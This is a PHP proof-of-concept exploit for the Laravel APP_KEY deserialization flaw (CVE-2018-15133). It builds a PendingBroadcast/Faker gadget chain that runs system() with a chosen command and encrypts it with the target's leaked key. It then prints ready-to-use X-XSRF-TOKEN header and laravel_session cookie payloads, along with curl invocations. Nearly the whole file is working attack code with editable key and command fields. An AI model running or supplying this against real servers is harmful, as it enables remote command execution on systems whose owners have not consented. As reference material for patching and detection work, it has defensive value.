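#!/usr/bin/env php
<?php
/*
 * PoC: Laravel "known APP_KEY" deserialization RCE (CVE-2018-15133 and the same
 * unserialize()-after-decrypt primitive in other affected builds).
 *
 * What you need before this is useful:
 *   - The target's APP_KEY (leaked .env, backup, exposed bucket, ...). The MAC
 *     below is keyed with it; without the key nothing here can be forged.
 *   - A code path that decrypts and then unserialize()s attacker input. For
 *     CVE-2018-15133 that is the X-XSRF-TOKEN *request header*; older
 *     EncryptCookies builds also unserialize() cookie values such as
 *     laravel_session (see the references at the bottom). Both forms are printed.
 *   - The gadget chain Illuminate\Broadcasting\PendingBroadcast::__destruct ->
 *     Faker\Generator::__call -> system() needs both classes autoloadable on
 *     the target. Faker is usually a dev-only dependency, so a
 *     `composer install --no-dev` deployment turns it into
 *     __PHP_Incomplete_Class and nothing executes.
 *
 * Usage: php <this file> [APP_KEY] [COMMAND]
 *   Both arguments are optional and fall back to the values edited below.
 *   APP_KEY may be pasted exactly as it appears in .env, with or without the
 *   "base64:" prefix.
 *
 * References:
 *   Encrypter whose output format this must match (6.x; encrypt/decrypt
 *   serialize/unserialize by default, which is the whole bug):
 *     https://github.com/laravel/framework/blob/6.x/src/Illuminate/Encryption/Encrypter.php
 *   https://blog.truesec.com/2020/02/12/from-s3-bucket-to-laravel-unserialize-rce/
 *   https://github.com/kozmic/laravel-poc-CVE-2018-15133
 */

$API_key = "dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0="; // edit here: the target's APP_KEY
$cmd = "ls -la"; // edit here: command to run on the target

/**
 * Normalise an APP_KEY as found in .env into raw key bytes.
 *
 * Laravel's EncryptionServiceProvider strips a leading "base64:" before
 * decoding, so both spellings are accepted. Decoding is strict on purpose: a
 * stray character would otherwise silently yield the wrong key and an
 * undebuggable "payload is invalid" on the target.
 *
 * @param string $appKey APP_KEY value, optionally prefixed with "base64:"
 * @return string raw key bytes
 * @throws RuntimeException if $appKey is not valid base64
 */
function decode_app_key(string $appKey): string
{
    $appKey = trim($appKey);
    if (strncmp($appKey, 'base64:', 7) === 0) {
        $appKey = substr($appKey, 7);
    }
    $raw = base64_decode($appKey, true);
    if ($raw === false) {
        throw new RuntimeException('APP_KEY is not valid base64.');
    }
    return $raw;
}

/**
 * Build the serialized gadget chain that calls system($cmd) when unserialized.
 *
 * Chain: PendingBroadcast::__destruct() calls $this->events->dispatch($this->event);
 * $events is a Faker\Generator whose formatters map "dispatch" => "system", so
 * Generator::__call('dispatch', [$cmd]) ends up as system($cmd).
 *
 * All three properties are protected, so their serialized names are
 * "\0*\0name" and the s:N length counts those NUL bytes. strlen() is used on
 * purpose: serialize() lengths are bytes, not characters, so $cmd may contain
 * quotes, UTF-8 or newlines without breaking the payload.
 *
 * @param string $cmd shell command to run on the target
 * @return string serialized PHP object graph
 */
function build_payload(string $cmd): string
{
    $events     = "\0*\0events";     // s:9
    $formatters = "\0*\0formatters"; // s:13
    $event      = "\0*\0event";      // s:8

    return 'O:40:"Illuminate\Broadcasting\PendingBroadcast":2:{'
        . 's:' . strlen($events) . ':"' . $events . '";'
        . 'O:15:"Faker\Generator":1:{'
        . 's:' . strlen($formatters) . ':"' . $formatters . '";'
        . 'a:1:{s:8:"dispatch";s:6:"system";}'
        . '}'
        . 's:' . strlen($event) . ':"' . $event . '";'
        . 's:' . strlen($cmd) . ':"' . $cmd . '";'
        . '}';
}

/**
 * Encrypt $plaintext the way Illuminate\Encryption\Encrypter::encrypt() does
 * (6.x): random IV, AES-CBC, MAC = HMAC-SHA256(base64(iv) . base64(ct), key),
 * then base64(json{iv, value, mac}). The cipher follows the key length the
 * same way Encrypter::supported() does: 16 bytes -> AES-128-CBC,
 * 32 bytes -> AES-256-CBC.
 *
 * NOTE(review): newer Encrypter versions add a "tag" member to the JSON; if a
 * target rejects the value as invalid, diff against its own Encrypter.php.
 *
 * @param string $plaintext raw bytes to encrypt (already serialized; not re-serialized here)
 * @param string $key       raw key bytes, e.g. from decode_app_key()
 * @return string the value the target's decrypt() will accept
 * @throws RuntimeException on an unsupported key length, OpenSSL or JSON failure
 */
function laravel_encrypt(string $plaintext, string $key): string
{
    $keyLen = strlen($key);
    if ($keyLen === 16) {
        $cipher = 'AES-128-CBC';
    } elseif ($keyLen === 32) {
        $cipher = 'AES-256-CBC';
    } else {
        throw new RuntimeException("APP_KEY must be 16 or 32 bytes, got {$keyLen}.");
    }

    $iv = random_bytes(openssl_cipher_iv_length($cipher));
    // options=0 makes openssl_encrypt() return base64; that base64 form is what
    // gets MACed and stored, exactly as in Encrypter::encrypt().
    $value = openssl_encrypt($plaintext, $cipher, $key, 0, $iv);
    if ($value === false) {
        throw new RuntimeException('Could not encrypt the data.');
    }

    $iv = base64_encode($iv);
    // Encrypter::hash(): HMAC over base64(iv) . base64(ciphertext) with the raw key.
    $mac = hash_hmac('sha256', $iv . $value, $key);
    $json = json_encode(compact('iv', 'value', 'mac'));
    if ($json === false || json_last_error() !== JSON_ERROR_NONE) {
        throw new RuntimeException('Could not json encode data.');
    }
    return base64_encode($json);
}

// Run only when executed directly, so the helpers above can be include()d
// (e.g. from a test) without printing or exit()ing.
if (PHP_SAPI === 'cli' && realpath($_SERVER['argv'][0] ?? '') === __FILE__) {
    $API_key = $_SERVER['argv'][1] ?? $API_key;
    $cmd     = $_SERVER['argv'][2] ?? $cmd;

    try {
        $encodedPayload = laravel_encrypt(build_payload($cmd), decode_app_key($API_key));
    } catch (RuntimeException $e) {
        fwrite(STDERR, '[-] ' . $e->getMessage() . PHP_EOL);
        exit(1);
    }

    // Header form: the target base64-decodes the header value as-is, so it must
    // NOT be URL-encoded ('+' -> '%2B' would decode to the wrong bytes and the
    // MAC check would fail).
    echo '[+] Header: X-XSRF-TOKEN: ' . $encodedPayload . PHP_EOL;
    // Cookie form: PHP URL-decodes cookie values before the app sees them, so
    // URL-encoding is required here (and harmless).
    echo '[+] Cookie: laravel_session=' . urlencode($encodedPayload) . PHP_EOL;
    echo "[+] e.g. curl -H 'X-XSRF-TOKEN: " . $encodedPayload . "' http://<domain or IP>/" . PHP_EOL;
    echo "[+]  or  curl -H 'Cookie: laravel_session=" . urlencode($encodedPayload) . "' http://<domain or IP>/" . PHP_EOL;
}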